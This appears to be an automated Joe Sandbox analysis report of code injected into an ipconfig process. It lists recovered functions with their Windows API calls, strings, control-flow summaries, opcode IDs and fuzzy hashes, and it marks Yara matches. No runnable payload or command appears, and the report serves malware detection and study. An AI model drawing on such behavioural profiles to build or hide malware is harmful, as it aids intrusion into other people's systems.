                                                                                                                              Function 00E4A3D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 644 e4a3d0-e4a419 call e4af20 NtReadFile
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 00E4A415
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID: !J
                                                                                                                              • API String ID: 2738559852-3122242347
                                                                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                              • Instruction ID: 264d6a5ae43e12a5228cd1046577c498caba09851ae8a5dfcab73a135aac8130
                                                                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                              • Instruction Fuzzy Hash: 94F0A4B2200208ABDB14DF89DC81EEB77ADAF8C754F158258BE1DA7241D630E8118BA0
                                                                                                                              Function 00E4A44A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(@M,?,?,00E44D40,00000000,FFFFFFFF), ref: 00E4A475
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID: @M
                                                                                                                              • API String ID: 3535843008-2208089455
                                                                                                                              • Opcode ID: e3abb0435320054c825172b2a0ebe16571dec310279e1de4bb39d7c27006568e
                                                                                                                              • Instruction ID: 7fa1389d33dbae3615873085694793c97ded50e14b34702bdbfd8938dd195e5f
                                                                                                                              • Opcode Fuzzy Hash: e3abb0435320054c825172b2a0ebe16571dec310279e1de4bb39d7c27006568e
                                                                                                                              • Instruction Fuzzy Hash: 10E08C77240210ABD710EBE49C45ED73BA8EF48624F1945A4BA589B352C234E90087D0
                                                                                                                              Function 00E4A450 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(@M,?,?,00E44D40,00000000,FFFFFFFF), ref: 00E4A475
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID: @M
                                                                                                                              • API String ID: 3535843008-2208089455
                                                                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                              • Instruction ID: 6190430b811e9570b4bd097042426eaf4567d6dc3e89981d76ca2d81c69ab211
                                                                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                              • Instruction Fuzzy Hash: EDD01776240214ABE710EB98DC85EA77BADEF48760F1544A9BA18AB242C530FA0086E0
                                                                                                                              Function 038A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4c858d9654a708a0cceac675ca7bf1146cf770cb5a4bc4efdb7c410acebd4a74
                                                                                                                              • Instruction ID: 019c52b94ad70aa093d01cb5f9f7c238fa37d62f7859816e72cd6b674375bb7d
                                                                                                                              • Opcode Fuzzy Hash: 4c858d9654a708a0cceac675ca7bf1146cf770cb5a4bc4efdb7c410acebd4a74
                                                                                                                              • Instruction Fuzzy Hash: 35900261202445478105B1984814656401E87E0201B65D061E20195A0DC62589996526
                                                                                                                              Function 038A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: e5ad8adabc0ac67c84d1ce0c1adb875f825e9ef5e14cad027ba02944de3745f3
                                                                                                                              • Instruction ID: 9658305635c94dc342e1cd9b6a960e92dc49fd523c4f0da0195c8143c5140b3f
                                                                                                                              • Opcode Fuzzy Hash: e5ad8adabc0ac67c84d1ce0c1adb875f825e9ef5e14cad027ba02944de3745f3
                                                                                                                              • Instruction Fuzzy Hash: FE900225211445474105F5980B04547005A87D5351365D061F201A560CD72189695522
                                                                                                                              Function 038A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 959d3b27e3b0eef449be1277cac262862a1258d371a001cc4e2b3de79e32edeb
                                                                                                                              • Instruction ID: f63585b79fb926cc35c75be32371d46d38fdcc38fc758317c743b0225bcb9d4b
                                                                                                                              • Opcode Fuzzy Hash: 959d3b27e3b0eef449be1277cac262862a1258d371a001cc4e2b3de79e32edeb
                                                                                                                              • Instruction Fuzzy Hash: F5900221211C4586D200B5A84C14B47001987D0303F65D155A1159564CCA1589695922
                                                                                                                              Function 038A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5033b06c75cacdce209ebb307de911bff9c761b91f12973e240a9a8755291120
                                                                                                                              • Instruction ID: 791bb5cf3cbaf4049c5418443a73ec1f8de52b7eb3fc176ce9d414aa23944820
                                                                                                                              • Opcode Fuzzy Hash: 5033b06c75cacdce209ebb307de911bff9c761b91f12973e240a9a8755291120
                                                                                                                              • Instruction Fuzzy Hash: 9D90026134144986D100B1984814B460019C7E1301F65D055E2069564D8719CD5A6527
                                                                                                                              Function 038A2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 34460ca5752512d7ac4cb72784eae9a671077b34f4e1afb3cc2cd02051f69331
                                                                                                                              • Instruction ID: a8079b7eed8f089bfc105e02fab1502e6d28b13a455d15e830f0e2ba66f6aad9
                                                                                                                              • Opcode Fuzzy Hash: 34460ca5752512d7ac4cb72784eae9a671077b34f4e1afb3cc2cd02051f69331
                                                                                                                              • Instruction Fuzzy Hash: 1E90027120144946D140B1984804786001987D0301F65D051A6069564E87598EDD6A66
                                                                                                                              Function 038A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d4c581f28ddadb6ce75f135404f266fea7f383a6c22666d533db88f701399b73
                                                                                                                              • Instruction ID: 6965cebe132cc1cc79cf203f5fe6f8d63f82c3874abb1c7ecf3f23b48d54494f
                                                                                                                              • Opcode Fuzzy Hash: d4c581f28ddadb6ce75f135404f266fea7f383a6c22666d533db88f701399b73
                                                                                                                              • Instruction Fuzzy Hash: FA900221242486969545F1984804547401A97E02417A5D052A2419960C8626995EDA22
                                                                                                                              Function 038A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: bcf61dbb757811e9cff7328af3eaa6ea3e93a9749d5585355606e9012ea6d924
                                                                                                                              • Instruction ID: 9c049891fc540308bc962f1acf4ccf67b96eb9840e1d6d66e2e39fee77818217
                                                                                                                              • Opcode Fuzzy Hash: bcf61dbb757811e9cff7328af3eaa6ea3e93a9749d5585355606e9012ea6d924
                                                                                                                              • Instruction Fuzzy Hash: 7390023120144957D111B1984904747001D87D0241FA5D452A1429568D97568A5AA522
                                                                                                                              Function 038A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2f05786258e34a80515f401014dac136dfee3374f0a09eeb74d5e3de5a5b780a
                                                                                                                              • Instruction ID: b938691fa7b4fff08a9d7560eb29a267a6abcee8e4fcd0403a6119c4c96a3bc5
                                                                                                                              • Opcode Fuzzy Hash: 2f05786258e34a80515f401014dac136dfee3374f0a09eeb74d5e3de5a5b780a
                                                                                                                              • Instruction Fuzzy Hash: 6A90022921344546D180B198580864A001987D1202FA5E455A101A568CCA15896D5722
                                                                                                                              Function 038A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 654eacc8fda6bebbe970984d9140a98c1e64c2e116ebbcb9702023216eadaf99
                                                                                                                              • Instruction ID: 64a988121ad00838b77991205d1cfc0303e549dfa2c0da0cbefcf3be32f52dd4
                                                                                                                              • Opcode Fuzzy Hash: 654eacc8fda6bebbe970984d9140a98c1e64c2e116ebbcb9702023216eadaf99
                                                                                                                              • Instruction Fuzzy Hash: 6990023120144946D100B5D85808686001987E0301F65E051A6029565EC76589996532
                                                                                                                              Function 038A2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: e197dfd517d804f86319a03d3aca5ca178801ff7809b0ee7f633fc579d7368fb
                                                                                                                              • Instruction ID: daa3bc50557a4935c16ae3b7db0c8024843a7ce493cf8acde18ca728c072a4ef
                                                                                                                              • Opcode Fuzzy Hash: e197dfd517d804f86319a03d3aca5ca178801ff7809b0ee7f633fc579d7368fb
                                                                                                                              • Instruction Fuzzy Hash: 0990023120144D86D100B1984804B86001987E0301F65D056A1129664D8715C9597922
                                                                                                                              Function 038A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8aeedc3f0758482121168734aea7559e56198e2d7bfe62bded71ba1bb7f8af0c
                                                                                                                              • Instruction ID: 413d789606420cf37c5bc76448e956df7934c751ca482f755ccc56889aee7f54
                                                                                                                              • Opcode Fuzzy Hash: 8aeedc3f0758482121168734aea7559e56198e2d7bfe62bded71ba1bb7f8af0c
                                                                                                                              • Instruction Fuzzy Hash: FD9002312014CD46D110B198880478A001987D0301F69D451A5429668D879589997522
                                                                                                                              Function 038A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c1a5342aa95e46ad2595bc76e5c65dd6f9fc4d9d82e4f9d54b4f8ab7d9fb5489
                                                                                                                              • Instruction ID: 0d21f5fe07b335be7a4702cf4bc279f9089ae93842372c1e0fd2144f8db7a71a
                                                                                                                              • Opcode Fuzzy Hash: c1a5342aa95e46ad2595bc76e5c65dd6f9fc4d9d82e4f9d54b4f8ab7d9fb5489
                                                                                                                              • Instruction Fuzzy Hash: 1290023160554946D100B1984914746101987D0201F75D451A1429578D87958A5969A3
                                                                                                                              Function 00E49040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 495 e49040-e49082 call e4bd00 498 e4915c-e49162 495->498 499 e49088-e490d8 call e4bdd0 call e3ace0 call e44e40 495->499 506 e490e0-e490f1 Sleep 499->506 507 e49156-e4915a 506->507 508 e490f3-e490f9 506->508 507->498 507->506 509 e49123-e49144 call e48e70 508->509 510 e490fb-e49121 call e48c60 508->510 514 e49149-e4914c 509->514 510->514 514->507
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00E490E8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 004887c11589396434634dbd5c9981ec386fb4843a024e1a7de2aff6759da3c3
                                                                                                                              • Instruction ID: 334777ec684b3a168586e61324946ee3a1f45e8b5b96feb138612641c23f322e
                                                                                                                              • Opcode Fuzzy Hash: 004887c11589396434634dbd5c9981ec386fb4843a024e1a7de2aff6759da3c3
                                                                                                                              • Instruction Fuzzy Hash: E131A1B2900745BBC724DF64D885FA7B7F8BB88B05F10801DF62A7B245DB30A550CBA4
                                                                                                                              Function 00E49036 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 515 e49036-e4906f 516 e4907b-e49082 515->516 517 e49076 call e4bd00 515->517 518 e4915c-e49162 516->518 519 e49088-e490d8 call e4bdd0 call e3ace0 call e44e40 516->519 517->516 526 e490e0-e490f1 Sleep 519->526 527 e49156-e4915a 526->527 528 e490f3-e490f9 526->528 527->518 527->526 529 e49123-e49144 call e48e70 528->529 530 e490fb-e49121 call e48c60 528->530 534 e49149-e4914c 529->534 530->534 534->527
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00E490E8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 4fcbb8edc6530f4dd33185664076486c410a58787b11843f7b247848b294b9f9
                                                                                                                              • Instruction ID: a6b359af2c744461d2506c1d2c22b40cc965d33308e1a695a1fe867035b066ed
                                                                                                                              • Opcode Fuzzy Hash: 4fcbb8edc6530f4dd33185664076486c410a58787b11843f7b247848b294b9f9
                                                                                                                              • Instruction Fuzzy Hash: 8C21D0B1A01345ABCB24DF64D8C5B67BBF4BB88B04F10805DE6297B246C774A550CBA5
                                                                                                                              Function 00E4A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 647 e4a5f0-e4a621 call e4af20 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(&E,?,00E44C9F,00E44C9F,?,00E44526,?,?,?,?,?,00000000,00000000,?), ref: 00E4A61D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: &E
                                                                                                                              • API String ID: 1279760036-1348104045
                                                                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                              • Instruction ID: 6395f787ecff017d54c8e01cdde5e106ef386e943fef6d7eec8eac8aa228020d
                                                                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                              • Instruction Fuzzy Hash: 56E046B2200208ABDB14EF99DC41EA777ADEF88764F158558FE186B242C631F914CBF0
                                                                                                                              Function 00E4A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 650 e4a630-e4a661 call e4af20 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E33AF8), ref: 00E4A65D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: .z`
                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                              • Instruction ID: a67ff051bdf7e19477de85be383d13a002a9506c7dfed3ccdbc707526043d170
                                                                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                              • Instruction Fuzzy Hash: F7E04FB22002046BD714DF59DC45EA777ADEF88750F014554FD1857241C631F914CAF0
                                                                                                                              Function 00E382D3 Relevance: 3.1, APIs: 2, Instructions: 62threadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E3836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E3838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 6fae3b0b1f1110f3ba984b54532f5f400ce58af10d3fcb7b37f8146a07d2ba7a
                                                                                                                              • Instruction ID: 27eb643a0738178ed2a4081575cd7e23e0539e6301c2c9675df14781911768d1
                                                                                                                              • Opcode Fuzzy Hash: 6fae3b0b1f1110f3ba984b54532f5f400ce58af10d3fcb7b37f8146a07d2ba7a
                                                                                                                              • Instruction Fuzzy Hash: 99114E729403287BDB11A664AC07FFE77986F40B55F091154FB04BB2C1DBA9AD0587F1
                                                                                                                              Function 00E38309 Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E3836A
